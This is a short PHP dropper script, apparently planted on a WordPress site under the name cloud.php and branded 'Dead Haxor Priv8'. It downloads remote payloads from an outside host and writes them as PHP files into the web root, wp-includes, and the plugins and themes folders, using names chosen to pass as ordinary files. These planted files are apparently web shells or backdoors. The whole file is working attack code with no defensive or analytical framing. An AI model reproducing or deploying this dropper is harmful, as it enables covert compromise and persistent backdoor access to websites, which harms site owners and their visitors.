File: /www/wwwroot/ahmsolaiman.com/cloud.php
<h3> Dead Haxor Priv8 </h3> <br> <br>
<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/txets.php" ;
$text = http_get('https://member.soraha.jp/crawler/bypo.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."<br>";
}else
echo "not exits";
echo "done Dead Haxor.\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/plugins/index.php" ;
$text2 = http_get('https://member.soraha.jp/crawler/index.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."<br>";
}else
echo "not exits2";
echo "done2 Dead Haxor.\n " ;
$check4 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/load.php" ;
$text4 = http_get('https://member.soraha.jp/crawler/bypo.txt');
$open4 = fopen($check4, 'w');
fwrite($open4, $text4);
fclose($open4);
if(file_exists($check4)){
echo $check4."<br>";
}else
echo "not exits4";
echo "done4 Dead Haxor.\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/txets.php" ;
$text3 = http_get('https://member.soraha.jp/crawler/txets.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
?>